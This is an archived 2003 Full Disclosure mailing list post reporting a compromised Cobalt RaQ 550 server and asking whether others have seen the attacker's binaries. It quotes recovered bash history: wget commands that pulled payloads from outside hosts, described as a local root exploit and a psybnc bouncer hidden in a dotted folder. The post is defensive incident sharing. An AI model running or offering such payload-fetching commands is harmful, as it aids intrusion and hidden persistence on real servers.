Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

raq 550 compromised
From: "adf--at--Code511.com" <adf () code511 com>
Date: Tue, 7 Oct 2003 03:37:24 +0200
sorry for the "cross-post", I just saw this message on cobalt-security mailing list today:
an user got his raq 550 compromised and he posted some bash history he found: 

-wget www.ps-lov.us/pizda.tgz
:unknown binaries (yet?) named "mumu"

-wget snow.prohosting.com/muiemuie/p.tar.gz
:Linux kernel ptrace/kmod local root exploit from ipsec

-wget snow.prohosting.com/muiemuie/p.tgz
: it will decompress psybnc in a hidden folder (.bash)

-wget snow.prohosting.com/muiemuie/km3.tgz ----->(file offline)
-wget 65.113.119.133/muiemuie/km3.tgz     ----->(file offline)


anyone seen pizda or mumu ?
if you interested in all details of the post: http://list.cobalt.com/pipermail/cobalt-security/2003-October/ 008607.html 

-deepquest

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]